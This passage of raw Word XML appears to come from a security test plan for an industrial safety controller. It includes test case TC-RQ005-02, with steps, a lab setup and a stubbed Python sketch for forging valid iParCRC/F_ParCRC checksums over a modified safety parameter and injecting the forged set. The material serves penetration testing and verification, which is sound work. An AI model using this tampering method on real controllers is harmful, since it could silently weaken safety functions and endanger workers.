          <w:p w14:paraId="52328B11" w14:textId="76111661" w:rsidR="009B13FB" w:rsidRPr="009C0080"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657DC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ifm CM-008</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="780DEE01" w14:textId="08946E32" w:rsidR="009B13FB" w:rsidRPr="009C0080"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C0080">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B13FB" w:rsidRPr="00CD1539" w14:paraId="226A4C51"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55CA8E" w14:textId="76D718CD" w:rsidR="009B13FB" w:rsidRDefault="00CD1539" w:rsidP="009B13FB">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C487556" w14:textId="3BF356C9" w:rsidR="009B13FB" w:rsidRPr="00154CD2" w:rsidRDefault="00CD153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D1539">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Analytical: argue why 1oo2 cross-check + STL cannot detect a coherent tamper; cross-reference Test 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62CA5695" w14:textId="6A853CA1" w:rsidR="009B13FB" w:rsidRPr="00154CD2" w:rsidRDefault="006634D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634D9">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Substantiates G-3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Self-test </w:t>
            </w:r>
            <m:oMath>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <m:t>≠</m:t>
              </m:r>
            </m:oMath>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>authenticity)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F547F6C" w14:textId="77777777" w:rsidR="00A51738"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51738">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Requirements/architecture analysis; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07687304" w14:textId="50C98DDF" w:rsidR="009B13FB" w:rsidRPr="00D657DC"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51738">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>IEC 61508 vs. 62443 integrity distinction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D16951D" w14:textId="52CC7405" w:rsidR="009B13FB"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SVV-1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D110E9C" w14:textId="5A7E5B07" w:rsidR="00A51738" w:rsidRPr="00A51738" w:rsidRDefault="00A51738" w:rsidP="00A51738">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="320F6ADA" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="148302C4" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="6"/>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Two-Level Test Catalog</w:t>
      </w:r>
      <w:commentRangeEnd w:id="6"/>
      <w:r w:rsidR="00447719">
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:commentReference w:id="6"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD2890B" w14:textId="77777777" w:rsidR="00376E64" w:rsidRDefault="00376E64" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="594DD37A" w14:textId="68977FFE" w:rsidR="00376E64" w:rsidRPr="00DB074F" w:rsidRDefault="00376E64" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB35D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ005-02 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB35D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid-CRC Forgery over Modified Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2305ED90"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22BAAC33"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7783EE" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="450D1A6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3E997B2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E6CDEA4" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61A629AB" w14:textId="3EE74742" w:rsidR="00B73A1A" w:rsidRPr="00CA0CC6" w:rsidRDefault="00753F11"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53F11">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ005-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="001604A0" w14:paraId="063412A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115A46A"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565140E9" w14:textId="2077E913" w:rsidR="00B73A1A" w:rsidRPr="00CA0CC6" w:rsidRDefault="005D5F1A"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5D5F1A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>RQ-005 → CR 3.4 → Asset B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00D67CA6" w14:paraId="0A3D685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6BC2247" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A7BCB91" w14:textId="58FAA8A7" w:rsidR="00B73A1A" w:rsidRPr="00CA0CC6" w:rsidRDefault="00376E64"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Tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w14:paraId="0D4A15A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0D8DCAB" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A96911E" w14:textId="53633385" w:rsidR="00B73A1A" w:rsidRPr="00CA0CC6" w:rsidRDefault="00376E64"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 xml:space="preserve">SVV-4 (Penetration Testing/ protocol manipulation) </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="3F146B5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E2C59EA" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36824817" w14:textId="09CD5A08" w:rsidR="00B73A1A" w:rsidRPr="00CA0CC6" w:rsidRDefault="00C567B9" w:rsidP="00C567B9">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1671"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C567B9">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Demonstrate that because iParCRC/F_ParCRC are non-secret checksums, an attacker who modifies the safety parameter set and recomputes matching CRCs produces a configuration the SCPU accepts — proving protection against accidental but not intentional corruption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="246398A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D67431A" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A4C5D8B" w14:textId="77777777" w:rsidR="0023138B" w:rsidRDefault="0023138B" w:rsidP="0023138B">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1983"/>
              </w:tabs>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0023138B">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Capture/derive a legitimate parameter record + F-Parameter block. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CBA1317" w14:textId="77777777" w:rsidR="0023138B" w:rsidRDefault="0023138B" w:rsidP="0023138B">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1983"/>
              </w:tabs>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0023138B">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Modify a safety-relevant iPar. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47988934" w14:textId="77777777" w:rsidR="0023138B" w:rsidRDefault="0023138B" w:rsidP="0023138B">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1983"/>
              </w:tabs>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0023138B">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3. Recompute iParCRC (UINT32) and F_ParCRC (UINT16).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D85E308" w14:textId="397B3B23" w:rsidR="00B73A1A" w:rsidRPr="00CA0CC6" w:rsidRDefault="0023138B" w:rsidP="0023138B">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1983"/>
              </w:tabs>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0023138B">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4. Present the forged configuration; observe whether the SCPU accepts it (reaches OPERATE) or raises EC3.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00FD6890" w14:paraId="6DA46E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BE403FB" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15796856" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="00CA0CC6" w:rsidRDefault="00B73A1A"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583F6E94" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="00AF57B2" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14821BE1"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4A07D98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7440BB" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CE4366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4CD8FAC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319851" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BAD27B4" w14:textId="1E2A181D" w:rsidR="00B73A1A" w:rsidRPr="00CA0CC6" w:rsidRDefault="00D23F76"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23F76">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ005-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="13F2E16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B19B50E" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51BD9D99" w14:textId="77777777" w:rsidR="00C410E9" w:rsidRDefault="00C410E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C410E9">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">SPS 192.168.0.1, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14E84B7A" w14:textId="77777777" w:rsidR="00C410E9" w:rsidRDefault="00C410E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C410E9">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">DUT 192.168.0.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="702DD639" w14:textId="77777777" w:rsidR="00C410E9" w:rsidRDefault="00C410E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C410E9">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pi eth0 = 192.168.0.100 (inject);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6443B13A" w14:textId="2EA44D14" w:rsidR="00B73A1A" w:rsidRPr="00CA0CC6" w:rsidRDefault="00C410E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C410E9">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> laptop mirror</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00BB230F" w14:paraId="768044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BEE6E4" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21AC9FEE" w14:textId="5D833A2F" w:rsidR="00B73A1A" w:rsidRPr="00CA0CC6" w:rsidRDefault="00BC69D3"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C69D3">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Scapy + iParCRC/F_ParCRC implementation (certified CRC-Tool spec); Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="5555815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E02AC9" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61ADE8CC"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#!/usr/bin/env python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67C8C255"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 TC-RQ005-02 Forge iParCRC/F_ParCRC over modified safety parameters</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BD42A1F"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 Precondition: CRC routine verified to reproduce a captured legitimate record bit-for-bit.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3560A8AD"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def ipar_crc32(params: bytes, seed: int) -&gt; int: ... # per certified CRC-Tool polynomial</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5833BE47"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def fpar_crc16(fparams: bytes) -&gt; int: ... # 16-bit F-Parameter CRC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="541783EE"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p w14:paraId="252D2F02"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params = bytearray(open("ref_ipar.bin","rb").read())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="517128A2"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params[7] = 0x02 # e.g. Filter F-DI 1: 5ms -&gt; 10ms (safety-relevant)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D309E92"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new_ipar = ipar_crc32(bytes(params), SEED).to_bytes(4,"big")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D40516E"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 write new_ipar into F-Parameter byte 9..12, recompute F_ParCRC, inject acyclic write (param phase)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FD624FA" w14:textId="3780D5AF" w:rsidR="00B73A1A" w:rsidRPr="00CA0CC6"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print("[+] forged parameter set with valid recomputed iParCRC/F_ParCRC prepared")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00AD4B09" w14:paraId="0F982DB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665266" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4574095E" w14:textId="6E889E79" w:rsidR="00B73A1A" w:rsidRPr="00CA0CC6" w:rsidRDefault="00D65F75"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Pr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Accepted/EC3 raised</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00FD6890" w14:paraId="562888D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C1ECC20" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2489D120" w14:textId="33D8EE51" w:rsidR="00B73A1A" w:rsidRPr="00CA0CC6" w:rsidRDefault="00AC2A55" w:rsidP="00655E93">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AC2A55">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC05-02_forge.pcapng, CRC-routine validation log, PLC state/diagnostic export</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C3ACA23" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C87113C" w14:textId="77777777" w:rsidR="00FE6490" w:rsidRDefault="00FE6490" w:rsidP="00CA0CC6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
